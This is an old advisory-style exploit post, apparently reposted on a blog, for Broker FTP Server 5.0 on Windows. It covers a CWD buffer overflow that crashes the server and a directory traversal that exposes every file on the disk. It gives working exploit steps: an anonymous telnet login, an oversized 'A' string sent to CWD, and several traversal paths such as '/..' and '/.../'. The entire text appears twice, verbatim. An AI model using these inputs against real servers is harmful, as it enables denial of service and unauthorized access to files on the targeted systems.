Product : Broker FTP Server
Version : 5.0
OSystem : Windows
Authors : TransSoft
WebSite : http://k.domaindlx.com/clairsang/www.ftp-broker.com/default.htm
Problem :
* Buffer Overflow in field CWD
* Access to all files on a disk
#[Denial of Service]#
Description:
------------
eng:
====
To arrange overflow in field CWD, necessary to send on it more than 256
bytes of dust.
After that server will fall, and will not submit any life attributes.
Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 FTP Server Ready [***]
>>USER anonymous
331 Password required for anonymous.
>>PASS anonymous@localhost
230-Welcome to Broker FTP Server.
230-
230 User anonymous logged in.
CWD AAAAAAAAAAA......AAAAA [256b]
*************************************
#[Access to all files on a disk]#
Description:
------------
rus:
====
За счет этой уязвимости вы можете получить доступ ко всем файлам на
жестком диске сервера
eng:
====
Due to this vulnerability you can get access to all files on a hard drive of the server
Exploits:
Current Directory : "/"
CWD *
CWD /*
CWD /..
CWD /...
CWD /.../
Version : 5.0
OSystem : Windows
Authors : TransSoft
WebSite : http://k.domaindlx.com/clairsang/www.ftp-broker.com/default.htm
Problem :
* Buffer Overflow in field CWD
* Access to all files on a disk
#[Denial of Service]#
Description:
------------
eng:
====
To arrange overflow in field CWD, necessary to send on it more than 256
bytes of dust.
After that server will fall, and will not submit any life attributes.
Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 FTP Server Ready [***]
>>USER anonymous
331 Password required for anonymous.
>>PASS anonymous@localhost
230-Welcome to Broker FTP Server.
230-
230 User anonymous logged in.
CWD AAAAAAAAAAA......AAAAA [256b]
*************************************
#[Access to all files on a disk]#
Description:
------------
rus:
====
За счет этой уязвимости вы можете получить доступ ко всем файлам на
жестком диске сервера
eng:
====
Due to this vulnerability you can get access to all files on a hard drive of the server
Exploits:
Current Directory : "/"
CWD *
CWD /*
CWD /..
CWD /...
CWD /.../
Không có nhận xét nào:
Đăng nhận xét